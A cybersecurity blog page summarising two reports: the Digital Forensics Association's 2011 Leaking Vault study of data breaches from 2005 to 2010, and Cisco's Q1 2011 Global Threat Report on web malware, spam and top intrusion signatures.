Search

Brian Pennington

A blog about Cyber Security & Compliance

Tag

Facebook

Six Years of Data Breaches including the TOP 10 largest Breaches

Vault IV
Image by jaygoldman via Flickr

The Leaking Vault 2011 report from the Digital Forensics Association has gathered data from studying 3,765 publicly disclosed data breach incidents, and is the largest study of its kind to date. Information was gleaned from the organizations that track these events, as well as government sources. Data breaches from 33 countries were included, as well as those from the United States.

This study covers incidents from 2005 through 2010, and includes over 806.2 million known records disclosed. On average, these organizations lost over 388,000 records per day/15,000 records per hour every single day for the past six years.

The estimated cost for these breaches comes to more than $156 billion to the organizations experiencing these incidents. This figure does not include the costs that the organizations downstream or upstream may incur, nor that of the data subject victims. Further, it is a low estimate of the cost, due to the fact that 35% of the incidents did not name a figure for records lost.

The Hacking vector remains the records loss leader, responsible for 48% of the records disclosed in the study.

  • In 65% of the cases, the data disclosed included the data subject’s name, address and Social Security Number
  • 16% disclosed medical information
  • 15% of the incidents disclosed Credit Card Numbers

Medical disclosures saw a significant increase with the addition of the 2010 data. This is more likely due to the reporting requirement of existing regulations going into effect than any actual increase of incidents. The incidents where criminal use of the data was confirmed increased by 58% from the prior report.

Here is a small sampling of the incidents from the study to put a personal face on the statistics:

Three servers from a well-known chain restaurant were charged with using skimming devices to make more than $117,000 in fraudulent charges to customer credit card accounts.

  • A restaurant employee stole customer credit card information and used it to purchase $200,000 of Walmart gift cards.
  • In the span of six months, nine employees of a telecommunications company inappropriately accessed confidential customer account information and used it to make cloned cell phones. Over $15 million of unauthorized phone calls resulted from this scheme.
  • An executive turned himself into authorities after being accused of selling customer information to identity thieves in exchange for sports tickets and gift cards.
  • The owner of a medical equipment business used Medicare client information to obtain approximately $1.6 million worth of fraudulent claims.
  • The owner of a farm equipment store pled guilty to federal charges, admitting she stole the identities of customers to obtain more than 80 loans worth $1.7 million.

Breach  Vectors

There has been a rise in snooping and other inappropriate disclosure where the confidentiality of the data is breached, but the data may not have left the control of the organization; or the act was done with the approval of the organization, but found later to be an inappropriate breach of confidentiality. In a recent case, UCLA Medical Center agreed to pay $865,000 to settle instances where employees snooped on the medical records of celebrities being treated at the facility.

Another example is when the California Department of Health Care Services released confidential and identifying information about HIV positive MediCal recipients to a third party service provider. This was later deemed to be both illegal and unauthorized. To classify these types of cases, the new breach vector of Disclosure has been added to the study beginning with 2011.

The Laptop Vector

Laptops increasingly contain significant amounts of organizational data. They are frequently the sole computer employee’s use, and come with a hard drive that can contain very large datasets. It is not uncommon for companies to find out after a breach incident that the individual assigned the asset had spreadsheets, and even whole databases containing sensitive data. When a laptop is issued to an individual, it should be accompanied by a set of rules for the custodian of the device to follow. This should include direction for maintaining physical control offsite (i.e., not to leave it in a vehicle, etc.) and onsite (i.e., lock it to their work surface), as well as controls for when these rules either are insufficient to keep the asset safe, or when the individual does not follow them. Potential controls include encrypting the device, remote wiping capability, tracking/recovery software, etc. The organization has a responsibility to the data subjects to take appropriate steps to ensure their data will not be at risk of disclosure when the unexpected happens.

Of the 3,765 incidents in the study, 719 involved laptops being improperly disposed of, getting stolen, or being lost. In 96% of these incidents, the laptops were stolen. Overall, the laptop vector accounted for 45,500,147 records in the study.

  • The largest quantity of laptops were stolen from the office of the organization suffering the loss. This illustrates the need for locking mechanisms for the laptops when unattended at work.
  • The second largest number of laptops were stolen from inside a vehicle. This is the most preventable, and represents 191 incidents over 4 million records.

The Hacking Vector

The 2010 data increasingly showed the prevalence of skimmer use. Skimmers are credit card readers that are typically hand held or installed in ATMs and point of sale devices to read the credit card track data and steal it. This was most commonly seen in retail establishments, and especially in restaurants. Anywhere the credit card is taken away from the customer’s control; there is a higher risk that a skimmer might be used by the dishonest. However, this is not to say that the card data is safe when in the control of the customer. Another increasingly common incident is the skimmer installed inside the gas pump. In this case, there is either a skimmer on the outside of the pump (these are becoming very clever and difficult to spot), or there is a device inside the pump where the customer has no hope of detecting it, and it can be wirelessly unloaded by the criminals, posing minimal risk of being caught.

The Large Incidents (Involving over 1 Million Records)

Only 66 of 3765 incidents involved over 1 million records. However, those 2% of incidents made up 91% of the records disclosed over the study. The top vector for large incidents was the Hack vector, claiming 29% of the incidents. The Drive/Media vector took 22% of the incidents, with the Fraud – SE vector accounting for 17%.

Breach Vectors of the Ten Largest Incidents   (2005 – 2010)
Organization Record Vector
Heartland Payment Systems 130,000,000 Hack
TJX Companies 94,000,000 Hack
Facebook 80,000,000 Web
National Archives 76,000,000 Drive/Media
Card Systems 40,000,000 Hack
RockYou, Inc. 32,000,000 Hack
U.S. Dept. of Veterans Affairs 28,600,000 Laptop
H.M. Revenue and Customs 25,000,000 Drive/Media
iBill 17,781,462 Fraud-SE
TMobile 17,000,000 Drive/Media

Criminal Use

Criminal or malicious motivation in attacks makes for more expensive breaches. This is true both for the organizations who suffer them, and the people whose data is compromised. Between 2005 and 2010, in 396 cases were confirmed to have been used for criminal activity. This is a difficult metric to track; since the criminal activity associated with breach activity shows that the data is commonly sold and resold.

The crime where the perpetrator has a direct connection to the victim is most frequently where the arrest is reported with the event. To that end, the Fraud-SE category is represented by a much higher margin than some of the vectors that have generated these large scale data disclosures.

Credit Cards

There were 558 incidents where CCN data was involved. They accounted for almost 330 million records. The median records disclosed was 1,000; and 45% of the incidents did not list how many records were disclosed. These records should fall under the Payment Card Industry’s Data Security Standard (PCI-DSS), and the organizations that have experienced these incidents will have to undergo further scrutiny to prove they are compliant with this standard.

The ID Theft Critical Data Elements

The Identity Theft critical data elements are those that, in combination with the Name and Address, facilitate the commission of identity theft and financial fraud—namely the SSN and date of birth. In TLV, we looked at the incidents with these three data items all lost in the same event. At the time of that study, there were only 262 incidents that contained all three items. In contrast, there are now a total of 1,084.

As you can see in the figure below, the Business sector shows a substantial increase. It has gone from 168 incidents in the prior study to 850. However, in only 13% of these cases where the combination of data puts the subject victim into the worst position possible, are these organizations confirmed to have offered credit monitoring. Now, there are a large number of unknowns in this area as well—in the majority of the cases, the reports simply do not say one way or the other whether this service is offered. This is a metric primarily gleaned from the original data breach notification letters obtained through either FOIA requests or from those government entities that are directly posting the original documents as part of the event report. For instance, in the Business sector, 38 cases are confirmed that the service definitely is not offered. In the remaining 701 records, the credit monitoring status is not provided.

Estimated Cost of Data Breaches/Year

Year Records Disclosed Cost Per Record Total Breach Records
2005 68,555,563 $138.00 $9,460,667,694.00
2006 80,377,865 $182.00 $14,628,771,430.00
2007 164,813,878 $197.00 $32,468,333,966.00
2008 182,707,769 $202.00 $36,906,969,338.00
2009 261,759,494 $204.00 $53,398,936,776.00
2010 48,080,863 $204.00* $9,808,496,052.00
Total 806,295,432 $156,672,175,256.00
*Cost figure from 2009.

The full The Leaking Vault 2011 report can be found here.

.

Advertisements

Global Threat Report Quarter 1 2011

Image representing Cisco as depicted in CrunchBase
Image via CrunchBase

The Cisco Quarter 1 2011 Global Threat Report has been released. The Cisco Global Threat Report is a compilation of data collected across the four segments of Cisco Security: ScanSafe, IPS, RMS and IronPort.

The highlights for Quarter 1 2011 include:-.

  • 105,536 unique Web malware were encountered in March 2011, a 46% increase from January 2011
  • Malicious webmail represented 7% of all Web-delivered malware in March 2011, a 391% increase from January 2011
  • 45% of all malicious webmail resulted from Yahoo! mail, 25% from Microsoft Live/Hotmail, and only 2% from Google’s Gmail
  • Search-engine-related traffic resulted in an average of 9% of all Web malware encountered in 1Q11
  • 33% of search engine encounters were via Google search engine results pages (SERPs), with 4% each from Yahoo! and Bing SERPs
  • SERPs and webmail encounters are impacted by the popularity of a particular service and are likely not indicative of any heightened risk specific to that service
  • Likejacking increased significantly during the first quarter of 2011, from 0.54% of all Web malware encounters in January 2011 to 6% in March 2011
  • At 13%, Miley Cyrus–themed likejacking scams beat out all other celebrities and events in March 2011. Likejacking themes for Indian actress Nayantara were at 7%, while Charlie Sheen was at 3%, Justin Bieber at 2%, and Lady Gaga at 1%
  • At 4% of all Web malware encounters in 1Q11, website compromises that attempted to download the Hiloti Trojan were the most frequently encountered, followed by malicious GIF injections (3%). Website compromises related to the Lizamoon series of SQL injection attacks represented just 0.15% of Web malware encounters for the quarter
  • Though far less successful than in years past, SQL injection attempts continued to be the most prevalent event firing (55%) observed by Cisco Remote Management Services in 1Q11
  • Malware activity related to the MyDoom worm was the 10th most frequently RMS-observed IPS event in 1Q11, demonstrating that legacy malware can still pose a threat to unprotected systems
  • As expected, Rustock activity declined significantly over 1Q11, but, interestingly, the sharp decline commenced weeks prior to the botnet takedown
  • Following 4Q10 declines, global spam volume increased and then subsequently decreased during 1Q11, but levels remained above that of December 2010
  • With an increase of 248%, Indonesia overtook the United States as the top spam-sending country in 1Q11
Cisco’s Top 10 Signature Findings Q1 2011  
Generic SQL Injection 55.03%
Web View Script Injection Vulnerability 7.01%
Gbot Command and Control Over HTTP 5.16%
B02K-UDP 5.20%
Cisco Unified Videoconferencing Remote Command Injection 4.91%
Microsoft Internet Explorer Invalid Flag Reference Remote Code Execution 3.27%
Windows MHTML Protocol Handler Script Execution 2.47%
WWW WinNT cmd.exe Access 1.30%
Web Application Security Test/Attack 1.19%
MyDoom Virus Activity 1.16%

Note that the MHTML vulnerability described in Microsoft KB 2501696, IntelliShield alert 22310, and Cisco Intrusion Prevention System (IPS) 6.0 – 33379/0 also appears on the Cisco RMS top 10 signature events list for 1Q11. Microsoft released an update for this former zero-day vulnerability in April 2011 (MS11-026).

While a significantly occurring event in 1Q11, SQL injection attempts remained at a fairly steady pace throughout the quarter with the only notable increase occurring in the latter part of March 2011.

Cisco RMS Top 10 by Port Activity
Port  Percentage
80 69%
40436 2.23%
25 2.17%
161 1.39%
5060 1.27%
123 1.16%
34227 1.13%
443 1.05%
21 1.00%
20 0.71%

Although they represent a relatively small percentage of overall spam, phishing attacks pose a serious risk to security, both from a financial and sensitive information disclosure perspective. In 1Q11, attackers increasingly turned their attention toward phishing Twitter accounts.

This interest in Twitter credentials is likely due in part to Twitter users’ acceptance of shortened URLs. By compromising Twitter accounts, attackers can take advantage of shortened URLs to entice followers to visit malicious links the users might ordinarily view as suspicious. Such attacks are further fuelled by the trust engendered through social networking in general.

The report can be downloaded here

.

Create a free website or blog at WordPress.com.

Up ↑

%d bloggers like this: